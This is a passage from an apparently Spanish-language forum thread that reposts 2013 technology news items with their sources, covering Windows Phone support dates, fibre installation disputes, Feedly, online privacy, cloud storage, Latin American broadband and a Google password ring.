Entre las ventajas del programa que lo distinguen de un procedimiento ordinario de mensajería por correo electrónico, sus creadores destacan "la rapidez del envío, la ausencia de registro en el sistema y las notificaciones sobre las fases del envió".

El sistema, que según los servicios penitenciarios rusos no tiene análogos en el mundo, funciona además las 24 horas al día y cuenta con un servicio de atención al cliente.

El precio del envío de un mensaje cuyo tamaño no está limitado es de un dólar, mientras que la propia aplicación se descarga gratis desde las tiendas virtuales de AppStore o Google Play.

FUENTE :http://www.20minutos.es/noticia/1759529/0/app/presos/carcel/
#33833
No lo ha dicho a bombo y platillo, pero Microsoft ha confirmado que dejará de dar soporte a Windows Phone 8 y Windows Phone 7.8 el año que viene. Será el mes de julio para la versión 8 y en septiembre para la versión 7.8. Windows Phone 8 es un sistema operativo bastante reciente, y este movimiento indica que en Redmond ya están preparando su próxima versión.

De hecho esto deja claro que Microsoft quiere un periodo de soporte para sus sistemas de un año y medio, y afortunadamente la actualización de Windows Phone 8 a la próxima versión (suponemos que se llamará Windows Phone 9 tal y como indican algunas ofertas de empleo de la compañía) no implicará la compra de nuevos terminales móviles como ha pasado en la actualización de Windows Phone 7 a 8.

En la fuente destacan algo importante: Microsoft puede haber fallado en más de un punto con su transición a sus nuevos sistemas, pero como mínimo ya dejan claro hasta qué fecha van a ofrecer soporte para cada versión. Compañías como Apple, por ejemplo, abandonan el soporte de las versiones antiguas de iOS por sorpresa y con el anuncio de una nueva versión, algo que ha provocado diversas reacciones entre los usuarios.

Aún falta mucho tiempo como para que nos atrevamos a adivinar fechas, pero los rumores más recientes apuestan por un lanzamiento de la próxima gran versión de Windows Phone para las próximas navidades. Sería un buen golpe de efecto para motivar a los que quieren regalar teléfonos nuevos a cambiar de plataforma.

Vía | TechCrunch

FUENTE :http://www.genbeta.com/movil/microsoft-dejara-de-dar-soporte-a-windows-phone-8-en-julio-del-2014
#33834
A pesar de que la instalación de fibra óptica hasta el hogar es gratuita, muchas comunidades de vecinos rechazan los permisos de instalación con razones un tanto rocambolestas. En el caso que veremos a continuación es Movistar quien desiste al ser obligada a aceptar condiciones "adicionales".

Según datos de Orange, en 2010 el 80% de las comunidades rechazó la instalación de fibra para participar en el piloto de la operadora. Mucho ha cambiado desde entonces porque la banda ancha de nueva generación ha comenzado a popularizarse y son los propios usuarios quiénes demandan mayor velocidad, eso sí, sigue habiendo inmuebles "imposibles para los operadores".

Ha llegado a nuestra redacción un permiso de instalación de Movistar denegado por la operadora porque el presidente de la comunidad quería imponer una serie de cláusulas adicionales que pasamos a resumir.

- Este permiso no supondrá en ningún caso, la constitución de una servidumbre a favor de movistar, cualquiera que sea el tipo de servidumbre.

- Solo podrá acceder al edficio personal de Movistar con autorización previa de la comunidad.

- La instalación de fibra en el edificio será retirada a simple demanda de la comunidad sin ningún tipo de indemnización, siendo asumidos los costes de la desinstalación por parte de la compañía.

Obviamente lo que ha sucedido es que este edificio madrileño con varias plantas ha quedado fuera de los planes de Movistar y también del resto de operadoras ya que los alternativos no desplegarán en zonas que han sido pasadas por el operador incunbente.  Otro detalle que nos parece curioso es que los vecinos que disponen de ADSL en este edificio navegan a velocidades reducidas debido a que están lejos de la central.

¿Qué harán dentro de unos años cuando los servicios online demanden conexiones de 100 megas? ¿Estás de acuerdo con el Presidente de esta comunidad?

FUENTE :http://www.adslzone.net/article11026-las-razones-rocambolescas-de-las-comunidades-de-vecinos-para-rechazar-la-fibra-de-movistar.html
#33835
Si bien el cierre de Google Reader era algo que se intuía a largo plazo, muchos no esperábamos que fuera a anunciarse tan pronto y a la mayoría de usuarios nos cogió por sorpresa. A pesar de esto, en Feedly fueron rápidos y demostraron cómo debe actuar un servicio cuando uno de su competencia cierra. No sólo mejoraron a nivel técnico sus servidores, sino que hicieron pública su intención de clonar la API de Google Reader.

Aunque todavía no han terminado, parecen ir por buen camino. En apenas 48 horas, Feedly ha dado la bienvenida a más de 500.000 nuevos usuarios, la mayoría de ellos pertenecientes a Google Reader y que están buscando ya una alternativa para no quedarse "tirados" cuando Google cierre definitivamente su lector de feeds el 1 de julio.

Feedly no es el único lector de RSS que ha sufrido avalancha masiva de nuevos usuarios estos días. Netvibes, por ejemplo, avisaba a sus usuarios durante el día del anuncio de que estaban mejorando a nivel técnico pero que el gran ritmo de creación de cuentas podía ralentizar en algunos puntos el servicio. Puede que Google Reader cierre pero todo esto demuestra una cosa: los lectores de feeds aún tienen mucha vida por delante.

Más información | Feedly http://blog.feedly.com/2013/03/15/priorities-keeping-the-site-up-and-adding-new-features/

FUENTE :http://www.laflecha.net/canales/blackhats/noticias/feedly-el-sustituto-de-google-reader
#33836
Cuánto se gasta en ropa, qué juegos prefiere, sus creencias religiosas, tendencia política, dónde pasó sus últimas vacaciones, su color favorito, o si es de tomar cerveza, vino o agua en las comidas. Muchos de estos detalles sobre usted están en Internet. Algunos los habrá publicado usted mismo, otros se pueden inferir de su actividad en la Red, qué páginas visita, qué aplicaciones se descarga en el móvil o simplemente de lo que otros dicen de su persona. La información está ahí y no hace falta ser malintencionado para encontrarla, aunque puede ser usada con malas intenciones.

Lo habitual, sin embargo, es que las empresas recaben y crucen datos personales para ofrecer publicidad muy individualizada en función de los gustos de cada uno, incrementando con ello sus posibilidades de venta. Así, la privacidad se ha convertido en la moneda con la que pagamos muchos de los servicios online aparentemente gratuitos. Otras veces, compartimos intimidades simplemente para satisfacer la necesidad humana de comunicarnos, según los sociólogos. Sea de manera intencionada o inconsciente, cada clic de ratón o palabra que escribimos en la blogosfera revela quiénes y cómo somos. Los expertos coinciden: la privacidad en Internet no existe, pero se puede gestionar cuánto enseñamos y qué imagen damos.

LEER MAS : http://sociedad.elpais.com/sociedad/2013/03/17/actualidad/1363555505_736818.html
#33837
Es común que productos y startups alcancen un límite a partir del cual ampliar su negocio o continuar innovando a gran escala resulta complicado y costoso. En el mercado del almacenamiento en la nube es probable que estemos asistiendo a dicha situación, con líderes como Dropbox o Box ampliando sus miras más allá del simple almacenamiento y gestión de datos y archivos.

Este mercado que las dos empresas mencionadas anteriormente inauguraron hace ya unos años, vio como poco a poco otras inicitivas de gigantes de la talla de Google (Drive), Microsoft (SkyDrive) y Apple (iCloud) pasaban a competir directamente con ellos, en un mercado que hace años no se consideraba importante.

La entrada de estos grandes protagonistas tiene un efecto sobre las empresas que crearon o potenciaron el mercado en primer lugar. El principal efecto es la búsqueda de nuevas fronteras, ofreciendo a los usuarios algo más que el simple almacenamiento y sincronización de datos. Empresas como Dropbox y Box llevan tiempo trabajando en este sentido, y la adquisición de Mailbox por parte de la primera puede ser una señal de que la empresa fundada por Drew Houston y Arash Ferdowsi quiere acelerar dicha transición.

De un feature hacia un suite de productos

Steve Jobs, al poco de intentar comprar Dropbox, afirmó que la compañía no tenía un producto en sí, si no que se trataba de un feature o característica complementaria. Más allá de la veracidad de dichas declaraciones, muy típicas de Jobs, lo cierto es que estas empresas han tenido y tienen que mirar más allá del simple almacenamiento de datos.

Dropbox se ha convertido en pieza esencial en muchas aplicaciones con su Sync API, que permite tener todos nuestros datos sincronizados entre varias aplicaciones, y recientemente introdujeron también un buen visualizador de fotografías online. Box, por su parte, lleva tiempo apostando por la posibilidad de editar documentos online, firmando acuerdos con empresas como Live Documents o Zoho. Y la semana pasada se produjo el último gran movimiento cuando Dropbox pagó cerca de $100 millones de dólares por una aplicación móvil de email que apenas tiene unos meses de vida.

Todos estos movimientos no son casuales y probablemente se deban a la necesidad de ampliar mercados y negocio. En un presente y un futuro en el que el móvil cobra cada vez más importancia, Dropbox controla ya una parte esencial y de integrar de una forma correcta Mailbox, puede todavía aumentar más su relevancia. Box, que no ha ocultado nunca sus planes de convertirse en una empresa pública y cotizar en bolsa, también es consciente de ello si nos atenemos a sus últimos movimientos.

El mercado del almacenamiento de datos en la nube es importante, pero no sería extraño que su volumen de negocio descienda con el paso de los años. Dropbox, considerado por muchos líder, tenía a finales del 2011 un 4% de usuarios de pago sobre un total de negocio de cerca de $100 millones de dólares. Con la entrada de grandes empresas como Microsoft, Apple y Google el negocio probablemente se contraiga.

Ante un mercado que cada vez es más bullicioso, ampliar las miras y apuntar más alto es una buena vía de diferenciación y de generación de negocio. Pagar $100 millones por una aplicación como Mailbox puede ser demasiado ambicioso o hasta temerario, pero sólo en un contexto como el actual puede entenderse que Dropbox y empresas similares pretendan alejarse de su valor o función principal.

FUENTE :http://www.genbeta.com/almacenamiento/cuando-el-simple-almacenamiento-en-la-nube-se-queda-pequeno
#33838
Las tabletas están consiguiendo que las ventas de ordenadores y portátiles caiga en picado. Muchos usuarios no acaban de decidirse a dar el salto, por lo que a continuación, os damos unos cuantos motivos para elegir una tableta en lugar de un ordenador.

Nos hacemos eco de la recopilación realizada por El Androide Libre, donde podemos ver las 10 razones para elegir una tableta antes que un PC o portátil. Esta recopilación debe servir para aclarar las dudas de los indecisos, que no saben si optar por una tableta o por un ordenador tradicional. Lo principal es ver el uso que se le va a dar al dispositivo, ya que existen muchas funciones que quedan reservadas solamente a los ordenadores. Estas son las razones para decantarnos por una tableta:

Seguir leyendo : http://www.adslzone.net/article10977-motivos-para-elegir-una-tableta-en-lugar-de-un-ordenador.html
#33839
Sólo una de cada ocho personas en América Latina tiene acceso a internet por sus altos precios, pese al potencial de esa tecnología para dinamizar la economía, dijo el presidente del Banco Interamericano de Desarrollo (BID), Luis Moreno.

¿Qué opinas de la falta de acceso a internet en la región? Participa en nuestros Foros.

"Nos estamos quedando atrás de esta carrera, es urgente buscar adoptar una regulación estratégica que nos permita cerrar esta brecha", dijo Moreno en un seminario sobre banda ancha como antesala a la 54 Asamblea de Gobernadores del BID.

Señaló que mientras la penetración de la telefonía móvil creció en más del 100 por ciento en los últimos años, la situación es diferente en lo relativo a banda ancha de internet, porque el servicio es caro y lento.

"Los que tienen banda ancha pagan demasiado por un servicio cuya velocidad es muy baja", dijo Moreno al señalar que los precios son "prohibitivos para nuestros ciudadanos".

El ejecutivo del BID indicó que "la banda ancha es un gran nivelador, porque tiene la capacidad de lograr acortar distancias y tiempo; la banda ancha es un potente dinamizador económico".

Estudios del BID señalan que un aumento del 10 por ciento de penetración de banda ancha podría generar un crecimiento adicional de 3.2 de la economía en América Latina y un aumento en la productividad de 2.2 por ciento.

Moreno explicó que mientras en Corea del Sur una persona destina un día de su salario para pagar un año de acceso a banda ancha en América Latina se necesitan 31 días.

Ante este escenario, Moreno planteó la necesidad de adecuar los marcos regulatorios, reducir precios y extender infraestructura por medio de alianzas públicas y privadas.

Consideró urgente cerrar la brecha, porque se calcula que en unos dos años el número de suscriptores de banda ancha móvil se puede multiplicar por cinco para llegar a más de 300 millones en 2015.

"Vamos a necesitar mas espectro radial para poder transmitir este tsunami de datos", advirtió Moreno.

FUENTE :http://www.iblnews.com/story/75603
#33840
Google, para proteger la seguridad de sus usuarios, está creando una especie de anillo donde podremos guardar todas nuestras contraseñas y acceder a los sitios web online con esas claves guardadas en su interior.

El modo de conexión se haría mediante NFC a un dispositivo USB especial conectado al ordenador, de esta forma nos proporcionará el login de usuario.

Este anillo no albergará la contraseña sino que será capaz de descifrar la contraseña cuando lo unamos al dispositivo USB que se conecta al ordenador. En el hipotético caso de que perdiéramos el anillo, también podríamos acceder a través de nuestro teléfono móvil. Al no tener las claves en su interior, si alguien roba dicho anillo no podrá recuperarlas ya que no funcionará sin el dispositivo USB que os comentamos.

Mayank UpadhyY, un ingeniero de Google experto en seguridad dijo que el hardware personal para iniciar sesión en ordenadores ajenos eliminaría los peligros de la reutilización de claves. Es algo similar a lo que ocurre con la opción de "Autenticación de Google en dos pasos", donde en nuestro móvil tenemos la aplicación Google Authenticator que nos genera claves de forma aleatoria y dinámica, las cuales tenemos que meter para iniciar sesión en ordenadores ajenos.

La idea sería una autenticación en dos pasos pero con hardware (y en un sólo paso).

¿Qué os parece esta idea de Google? Y lo que es más importante, ¿costará mucho para el usuario el hardware necesario?

Vïa El Economista

FUENTE :http://www.redeszone.net/2013/03/18/google-esta-disenando-un-anillo-para-guardar-contrasenas/